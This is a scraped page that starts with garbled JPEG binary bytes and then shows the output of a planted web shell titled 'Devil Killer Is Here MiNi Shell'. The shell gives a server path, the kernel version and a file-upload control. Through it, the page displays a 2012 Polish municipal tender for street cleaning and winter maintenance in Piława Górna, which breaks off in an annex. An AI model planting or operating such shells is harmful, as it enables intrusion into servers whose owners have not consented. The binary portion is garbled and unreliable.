JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120217/47954-N-2012.html

<p class="kh_header"><b>Piława Górna: Część I.	Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2012 r. do 14.11.2012 r. oraz od 16.03.2013 r. do 14.11.2013 r.
Część II.	Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2012 r. do 15.03.2013 r. oraz od 15.11.2013 r. do 15.03.2014 r.</b><br>
<b>Numer ogłoszenia: 47954 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piława Górna , ul. Piastowska 29, 58-240 Piława Górna, woj. dolnośląskie, tel. 074 8324934, faks 074 8371386.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pilawagorna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I.	Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2012 r. do 14.11.2012 r. oraz od 16.03.2013 r. do 14.11.2013 r.
Część II.	Zimowe utrzymanie ulic, chodników i placów w okresie:
od 15.11.2012 r. do 15.03.2013 r. oraz od 15.11.2013 r. do 15.03.2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług  polegających na oczyszczaniu miasta oraz zimowym utrzymaniu ulic, chodników i placów tj. ulice administrowane przez                           Gminę Piława Górna w ilości: 24 334,5 mb - 117 876 m2; 
w tym ulice które należy utrzymywać w stałej przejezdności - 3 275 mb - 11 068,5 m2. Przedmiot zamówienia składa się z dwóch części:
Część I.	Oczyszczanie ulic, chodników i placów
1.	Oczyszczanie ulic i placów tj. usunięcie wszelkich zanieczyszczeń sypkich, liści, błota, ziemi oraz pozostałych odpadów przy użyciu zamiatarek mechanicznych. Oczyszczanie mechaniczne nie może powodować utrudnień w ruchu samochodowym i pieszym (sprzątanie winno odbywać się poza godzinami szczytu komunikacyjnego) oraz nie może być przyczyną skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
2.	Oczyszczanie  chodników  przy drogach, (w tym przystanków), parkingów poprzez dokładne zebranie i zamiatanie występujących nieczystości (np. piasek. liście, kwiatostany) aż do całkowitego ich usunięcia ręcznie lub przy użyciu przeznaczonych do tego celu zamiatarek  mechanicznych. Oczyszczanie mechaniczne chodników musi odbywać się w taki sposób, aby nie powodowało utrudnień w ruchu pieszym i skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
3.	Usuwanie zanieczyszczeń uprzątniętych z chodników przez właścicieli nieruchomości.
4.	Wywóz zebranych nieczystości do miejsc ich unieszkodliwienia.
5.	Zbieranie zanieczyszczeń i koszenie poboczy, pasów zieleni i rowów przy drogach oraz wywóz skoszonych części roślin.
6.	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej,                       ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym                           (80 pojemników należy opróżniać 2 x w tygodniu).
7.	Utrzymanie wiat przystankowych w ilości 11 szt, w czystości  poprzez co najmniej              6 - krotne  mycie  w ciągu roku. 
8.	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami             w tym zakresie.
9.	Malowanie i naprawa ławek (20 szt.)i skrzyń drewnianych na piasek (7 szt.) ustawionych na chodnikach i przy przystankach.
10.	Usuwanie odpadów powstałych na skutek wypadków i zjawisk                   atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
11.	Usuwanie większych odpadów z rzeki Piławy, w granicach administracyjnych miasta Piława Górna.
12.	Obsługę akcji: Sprzątanie Świata - usunięcie zebranych odpadów z wyznaczonych punktów miasta.
13.	Wymienione prace należy wykonywać zgodnie z przepisami ustawy z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm.) oraz ustawy z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.).
Część II.	Zimowe utrzymanie ulic, chodników i placów
1.	Odśnieżanie 
Dopuszczalna jest cienka warstwa zajeżdżonego śniegu, nie utrudniającego poruszania się. Gołoledź (cienka warstwa lodowa o grubości do 1 mm) powinna znikać po trzech godzinach od momentu pojawienia się. 
2.	Likwidację śliskości (posypywanie dróg oraz chodników i placów na całej szerokości),
3.	Zapewnienie, aby części jezdni przy przejściach dla pieszych i przystankach autobusowych były w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu - przez ich ręczne doczyszczenie, 
4.	Zbieranie i pozbywanie się śniegu, lodu oraz innych zanieczyszczeń z przystanków  komunikacyjnych, 
5.	Wywóz śniegu z ulic, placów  i chodników (w tym: uprzątniętego przez właścicieli nieruchomości), gdzie stanowiłby on przeszkodę dla ruchu ulicznego i pieszego - przejścia dla pieszych.
Uwaga. 
Śnieg nie może być gromadzony w pryzmach o wysokości większej niż 1 m. Stosy te nie mogą być przeszkodą dla ruchu oraz nie mogą zamykać dojazdu do nieruchomości, 
6.	Zapewnienie, aby części jezdni przy krawężnikach oraz studzienki kanalizacyjne były            w okresie mrozów i opadów śnieżnych oczyszczone ze śniegu i lodu w stopniu umożliwiającym spływ z jezdni wody powstałej z topniejącego śniegu.
7.	Montaż, we wskazanych przez Zamawiającego miejscach, siatek przeciwśnieżnych przekazanych przez Zamawiającego w ilości ok. 400 mb oraz ich demontaż w terminie wskazanym przez Zamawiającego.
Jeżeli zima będzie bezśnieżna obowiązkiem firmy jest dokładne sprzątanie ulic, chodników i placów oraz wywóz  zebranych śmieci.
8.	Prowadzenie ZUD:
1)	zwalczanie gołoledzi, lodowicy, śliskości pośniegowej, szronu, szadzi                             przy użyciu materiałów naturalnych;
2)	odśnieżanie i uszorstnianie materiałami naturalnymi;
3)	zwalczanie śliskości materiałami uszorstniającymi z użyciem środków chemicznych (mieszanka 1:10).
9.	Kolejność i standardy zimowego utrzymania dróg. 
Jezdnie stanowiące przebieg ciągów ulicznych zostały podzielone na trzy kategorie tj. I, II i III.
Pierwsza (I) - część dróg lokalnych miejskich, stanowiąca podstawowy układ komunikacyjny miasta. 
Do odśnieżania i likwidacji śliskości należy przystąpić gdy warstwa śniegu przekroczy 3 cm. Odśnieżanie i posypywanie powinno być zakończone w ciągu 4 godzin po ustaniu opadów;
Druga (II)   -  część dróg lokalnych miejskich, stanowiących uzupełnienie układu podstawowego.
Do odśnieżania i likwidacji śliskości należy przystąpić                           po zakończeniu odśnieżania dróg I kolejności. Odśnieżanie                       i posypywanie powinno być zakończone w ciągu 6 godzin po ustaniu opadów;
Trzecia (III)  -    pozostałe drogi lokalne miejskie.
Do odśnieżania i likwidacji śliskości należy przystąpić                            po zakończeniu odśnieżania dróg II kolejności. Odśnieżanie                      i posypywanie powinno być zakończone w ciągu 8 godzin po ustaniu opadów.
Pozostałe gminne drogi  - należy utrzymywać w stałej przejezdności. 
10. Zwalczanie śliskości jezdni
1)	Przejazdy patrolowe wykonywane przez pługopiaskarki  i rozrzutniki połączone                z uszorstnianiem nawierzchni jezdni w miejscach, gdzie wystąpiło zjawisko;
2)	Posypywanie mechaniczne naturalnym materiałem uszorstniającym;
3)	Odśnieżanie jezdni po rozpoczęciu opadów (w miarę potrzeb połączone                               z uszorstnianiem).
11.	Utrzymywanie w czystości ulic, chodników i placów.
1)	Zbieranie i wywóz odpadów zgromadzonych w przeznaczonych do tego celu urządzeniach ustawionych na chodnikach (ul. Młynarskiej, ul. Piastowskiej,                ul. Chrobrego), w tym również na przystankach autobusowych oraz utrzymanie tych urządzeń w odpowiednim stanie sanitarnym, porządkowym i technicznym                   (80 pojemników należy opróżniać 2 x w tygodniu);
2)	Zbieranie z ulic, chodników i placów zwłok bezdomnych zwierząt i ich części oraz pozbywanie się ich. Usuwanie martwych zwierząt winno występować niezwłocznie, po wystąpieniu takiego faktu, postępując przy tym zgodnie z obowiązującymi przepisami w tym zakresie;
3)	Usuwanie odpadów powstałych na skutek wypadków i zjawisk                   atmosferycznych, w tym również usuwanie wiatrołomów i drzew uszkodzonych, stanowiących zagrożenie i przeszkody komunikacyjne (bezpośrednio                        po wystąpieniu zjawiska, w uzgodnieniu z Zamawiającym).
12.	Wymienione prace należy wykonywać zgodnie z przepisami ustawy z dnia 
13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008 z późn. zm.) oraz ustawy z dnia 27 kwietnia 2001 r. o odpadach                (Dz. U. z 2010 r. Nr 185, poz. 1243 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.90.40.00-7, 90.51.13.00-5, 90.51.32.00-8, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w  niniejszym postępowaniu nie będzie żądał wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o wykaz usług analogicznych z przedmiotem zamówienia: 
a)	dla Części I przedmiotu zamówienia - Oczyszczanie ulic, chodników i placów -  minimum 2 usługi o łącznej wartości nie mniejszej niż 100 000 zł brutto 
i/lub 
b)	dla Części II przedmiotu zamówienia - Zimowe utrzymanie ulic, chodników                 i placów - minimum 2 usługi o łącznej wartości nie mniejszej niż 100 000 zł brutto, 
lub
c)	dla Część I i Część II przedmiotu zamówienia jeżeli zakres świadczonych usług obejmuje łącznie letnie i zimowe utrzymanie dróg -  minimum 2 usługi o łącznej wartości nie mniejszej niż 200 000 zł brutto  
wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania lub wykonywania oraz załączeniem dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie. Dokumentami potwierdzającymi taki stan rzeczy są dla Zamawiającego referencje lub inne dokumenty potwierdzające prawidłowe wykonywanie usługi. Zakres rzeczowy składanych przez Wykonawcę dokumentów zależy od tego, czy składa on ofertę obejmującą jedną, czy obie części przedmiotu zamówienia oraz od tego jaki był zakres wykonanych lub wykonywanych przez niego usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym.
Wykonawca oświadcza, że w całym okresie obejmującym termin realizacji przedmiotu zamówienia  będzie dysponował, minimum, następującym sprzętem:
dla Części I
a)	zamiatarka do sprzątania ulic - 1 szt.;
b)	zamiatarka do sprzątania chodników - 1 szt.;
c)	pojazd umożliwiający wywóz zebranych odpadów - 1 szt.;
dla Części II
a)	pług lub inne urządzenie do odśnieżania ulic - 2 szt.;
b)	pług lub inne urządzenie do odśnieżania chodników - 1szt.;
c)	solarkopiaskarka - 2 szt.;
d)	pojazd umożliwiający wywóz zebranych odpadów oraz śniegu - 1 szt.;
e)	ładowarka do załadunku śniegu - 1 szt.;
f)	zamiatarka do sprzątania ulic - 1 szt. (w przypadku bezśnieżnej zimy lub po odwilży);
g)	zamiatarka do sprzątania chodników - 1 szt. (w przypadku bezśnieżnej zimy lub po odwilży).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli jest obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy przedstawiający ceny za wykonanie robót określonych w SIWZ - załącznik nr 1 do SIWZ

Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy dla Części I przedmiotu zamówienia - Oczyszczanie ulic, chodników i placów - załącznik nr 4 do SIWZ.
Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy dla Części II przedmiotu zamówienia - Zimowe utrzymanie ulic, chodników  i placów - załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza w trybie art. 144 ustawy Pzp możliwość zmiany postanowień zawartej umowy w zakresie:
1)	zmiany okresu wykonania umowy, o którym mowa w § 6 w przypadku zaistnienia okoliczności niezależnych od Wykonawcy po ich uwzględnieniu przez Zamawiającego,  szczególnie w przypadku:
a)	jeżeli powstały opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez, lub dające się przypisać, Zamawiającemu lub personelowi Zamawiającego, 
b)	siły wyższej,
c)	opadów śniegu lub powstania oblodzeń dróg i chodników wymagające podjęcia zimowego utrzymania dróg w okresie letniego utrzymania dróg; 
2)	zmiany zakresu rzeczowego robót wynikających z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy i nie powodujące zmiany wysokości  wynagrodzenia Wykonawcy; 
3)	zmiany wynagrodzenia spowodowanego zmianą okresu wykonania umowy wymienionego w pkt.1);
4)	Zmiany warunków płatności wynikających z potrzeb Zamawiającego lub Wykonawcy i nie naruszających interesu Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pilawagorna.bip.ornak.pl/pl/bip/przetargi/ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piława Górna
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II p.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 10:00, miejsce: Urząd Miasta Piława Górna
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oczyszczanie ulic, chodników i placów w okresie:
od 16.03.2012 r. do 14.11.2012 r. oraz od 16.03.2013 r. do 14.11.2013 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I.	Oczyszczanie ulic, chodników i placów
1.	Oczyszczanie ulic i placów tj. usunięcie wszelkich zanieczyszczeń sypkich, liści, błota, ziemi oraz pozostałych odpadów przy użyciu zamiatarek mechanicznych. Oczyszczanie mechaniczne nie może powodować utrudnień w ruchu samochodowym i pieszym (sprzątanie winno odbywać się poza godzinami szczytu komunikacyjnego) oraz nie może być przyczyną skarg mieszkańców np. na pył i kurz unoszący się w powietrzu.
